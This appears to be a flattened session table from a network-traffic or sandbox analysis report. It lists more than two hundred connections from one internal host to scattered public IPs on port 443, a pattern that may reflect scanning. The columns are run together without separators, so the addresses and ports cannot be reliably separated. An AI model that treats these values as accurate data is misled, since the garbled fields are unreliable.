                                        12061192.168.2.2349580178.47.205.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12062192.168.2.2357804200.191.143.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12063192.168.2.234847866.211.102.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12064192.168.2.2334940142.185.153.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12065192.168.2.234818846.3.232.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12066192.168.2.2336066212.124.135.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12067192.168.2.2336562141.204.143.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12068192.168.2.2333822204.155.92.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12069192.168.2.2357106126.63.26.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12070192.168.2.2357662132.55.63.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12071192.168.2.23583905.157.239.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12072192.168.2.2334892129.88.230.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12073192.168.2.2344034146.39.146.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12074192.168.2.2354798218.140.80.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12075192.168.2.2334686180.10.110.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12076192.168.2.2342722121.121.196.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12077192.168.2.234404037.8.93.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12078192.168.2.23376682.36.138.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12079192.168.2.2347598121.115.151.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12080192.168.2.2354400104.19.10.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12081192.168.2.234065832.130.238.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12082192.168.2.2358634135.242.180.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12083192.168.2.2335436171.192.150.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12084192.168.2.235348299.233.73.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12085192.168.2.2345578177.68.243.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12086192.168.2.2343744196.212.123.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12087192.168.2.2344078217.138.221.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12088192.168.2.2345048135.87.157.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12089192.168.2.2334226194.69.102.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12090192.168.2.2342716174.111.156.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12091192.168.2.2359840165.224.49.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12092192.168.2.234724470.97.126.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12093192.168.2.234731872.100.137.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12094192.168.2.234717481.144.99.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12095192.168.2.235628063.15.66.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12096192.168.2.2336004101.74.206.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12097192.168.2.2337998121.115.0.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12098192.168.2.2354666198.219.229.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12099192.168.2.2354540204.30.133.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12100192.168.2.2346328204.15.251.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12101192.168.2.2355640185.209.153.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12102192.168.2.234965283.7.14.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12103192.168.2.2345212173.33.155.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12104192.168.2.235350465.42.206.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12105192.168.2.235457412.220.161.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12106192.168.2.2354752199.167.65.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12107192.168.2.233309683.7.237.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12108192.168.2.2334004160.87.179.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12109192.168.2.2343386141.199.5.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12110192.168.2.235968850.103.141.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12111192.168.2.2348016156.159.44.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12112192.168.2.2345982189.23.47.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12113192.168.2.235701084.5.162.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12114192.168.2.2334978107.110.155.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12115192.168.2.2340974210.7.90.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12116192.168.2.2340096208.159.112.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12117192.168.2.235794019.85.52.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12118192.168.2.2347624122.226.185.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12119192.168.2.233414045.246.152.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12120192.168.2.236026066.209.77.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12121192.168.2.2347788134.177.149.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12122192.168.2.2354252120.210.51.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12123192.168.2.2345408191.206.150.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12124192.168.2.234925297.79.216.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12125192.168.2.2351114137.121.127.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12126192.168.2.235982891.71.62.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12127192.168.2.235190446.109.163.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12128192.168.2.2356362108.38.206.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12129192.168.2.2343564188.247.217.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12130192.168.2.235499071.183.188.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12131192.168.2.234952845.181.160.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12132192.168.2.234412651.44.84.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12133192.168.2.233448627.173.172.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12134192.168.2.233295075.211.174.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12135192.168.2.233792443.80.202.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12136192.168.2.235408697.78.50.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12137192.168.2.2358512136.203.149.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12138192.168.2.2335788199.169.131.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12139192.168.2.233453824.17.4.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12140192.168.2.234911648.73.145.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12141192.168.2.2359260198.246.11.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12142192.168.2.2341828175.93.90.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12143192.168.2.2357888162.125.114.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12144192.168.2.2342180117.177.45.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12145192.168.2.2335326178.148.15.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12146192.168.2.2344772112.162.77.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12147192.168.2.2334350195.11.121.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12148192.168.2.2340620153.208.107.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12149192.168.2.2350456138.58.137.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12150192.168.2.2337218120.87.110.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12151192.168.2.234420283.237.239.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12152192.168.2.2337278186.124.3.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12153192.168.2.2357324151.14.29.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12154192.168.2.2345656207.8.207.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12155192.168.2.2350532222.187.205.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12156192.168.2.2351828197.173.244.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12157192.168.2.2345992203.58.25.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12158192.168.2.23572789.193.184.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12159192.168.2.233277619.55.15.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12160192.168.2.2339706183.43.177.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12161192.168.2.235997647.35.149.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12162192.168.2.2349924161.77.124.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12163192.168.2.2345550199.161.241.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12164192.168.2.2355082209.148.157.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12165192.168.2.2353892180.230.195.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12166192.168.2.233620669.201.187.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12167192.168.2.2335176209.85.120.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12168192.168.2.2354334219.100.206.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12169192.168.2.233716671.17.169.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12170192.168.2.2340254218.207.78.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12171192.168.2.2342030206.75.150.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12172192.168.2.2360748138.250.10.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12173192.168.2.23477565.123.194.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12174192.168.2.233929896.157.17.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12175192.168.2.2341206118.17.11.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12176192.168.2.2336552211.79.123.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12177192.168.2.234025031.93.228.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12178192.168.2.2343054170.39.90.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12179192.168.2.2349554110.234.49.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12180192.168.2.2342392146.244.154.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12181192.168.2.2358408135.64.184.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12182192.168.2.233873874.103.40.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12183192.168.2.2355086197.235.89.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12184192.168.2.2350956126.113.183.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12185192.168.2.234915886.2.190.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12186192.168.2.2338262200.80.24.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12187192.168.2.2333624211.95.155.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12188192.168.2.236041252.116.216.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12189192.168.2.2338766120.173.122.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12190192.168.2.2337498145.195.209.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12191192.168.2.233372677.233.182.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12192192.168.2.2346938193.203.192.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12193192.168.2.235131850.204.40.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12194192.168.2.234530446.23.219.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12195192.168.2.2342200145.173.150.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12196192.168.2.2335238135.219.3.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12197192.168.2.2333388218.155.41.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12198192.168.2.2342918195.203.39.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12199192.168.2.2334346157.255.40.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12200192.168.2.235553063.190.169.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12201192.168.2.235852253.200.227.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12202192.168.2.233437263.84.110.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12203192.168.2.2354998166.176.62.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12204192.168.2.234457059.219.205.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12205192.168.2.2348210149.205.20.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12206192.168.2.2350562145.112.47.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12207192.168.2.233781082.108.78.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12208192.168.2.235977886.22.41.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12209192.168.2.2344004151.154.71.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12210192.168.2.2340430118.188.229.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12211192.168.2.2344460193.132.159.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12212192.168.2.2333430167.34.38.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12213192.168.2.2355076140.156.216.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12214192.168.2.2345250114.200.74.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12215192.168.2.2345048182.173.160.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12216192.168.2.2353544154.108.194.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12217192.168.2.2345778171.222.44.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12218192.168.2.2340812187.91.105.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12219192.168.2.2355530150.202.41.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12220192.168.2.2351986120.117.220.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12221192.168.2.2336474158.125.175.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12222192.168.2.2343658160.226.46.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12223192.168.2.2339260203.13.140.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12224192.168.2.23480665.151.98.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12225192.168.2.234859838.14.1.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12226192.168.2.233320025.3.248.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12227192.168.2.235582013.116.78.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12228192.168.2.234075869.187.5.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12229192.168.2.235876697.45.59.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12230192.168.2.2349556119.77.231.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12231192.168.2.2339168189.247.86.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12232192.168.2.2334372154.94.160.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12233192.168.2.235746865.250.25.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12234192.168.2.234131899.238.89.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12235192.168.2.234178613.209.231.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12236192.168.2.235471493.50.166.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12237192.168.2.2343200178.91.203.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12238192.168.2.2347100121.236.190.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12239192.168.2.234533451.58.21.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12240192.168.2.235992827.141.69.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12241192.168.2.2357364150.80.237.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12242192.168.2.235784644.25.171.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12243192.168.2.23594604.109.84.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12244192.168.2.2335622217.217.71.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12245192.168.2.233856487.75.4.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12246192.168.2.2347610211.177.203.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12247192.168.2.2353934199.52.234.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12248192.168.2.2348832176.101.8.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12249192.168.2.2353266163.239.222.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12250192.168.2.233442637.245.200.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12251192.168.2.2336970134.165.23.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12252192.168.2.235235698.68.204.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12253192.168.2.2349188187.18.151.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12254192.168.2.2346608133.78.129.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12255192.168.2.2343288220.241.51.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12256192.168.2.235986419.94.17.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12257192.168.2.234154663.231.163.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12258192.168.2.234430498.234.167.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12259192.168.2.233821813.190.49.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12260192.168.2.2341860144.30.53.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12261192.168.2.23504501.190.226.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12262192.168.2.2341276125.8.174.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12263192.168.2.234027624.12.81.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12264192.168.2.2353616199.27.98.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12265192.168.2.2334836192.244.15.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12266192.168.2.2347686114.238.241.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12267192.168.2.233561083.21.200.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12268192.168.2.2347600159.33.34.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12269192.168.2.2340774102.87.246.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12270192.168.2.2358678206.197.201.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12271192.168.2.23497385.61.47.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12272192.168.2.234156031.132.248.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12273192.168.2.235761476.200.205.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12274192.168.2.23517085.173.0.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12275192.168.2.2339480187.184.197.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12276192.168.2.2342712134.210.129.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12277192.168.2.2358098211.219.135.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12278192.168.2.235300245.113.101.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12279192.168.2.2347172138.250.130.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12280192.168.2.2353964119.95.80.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12281192.168.2.2345030207.99.20.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12282192.168.2.2344968169.73.131.198443
                                        TimestampBytes transferredDirectionData


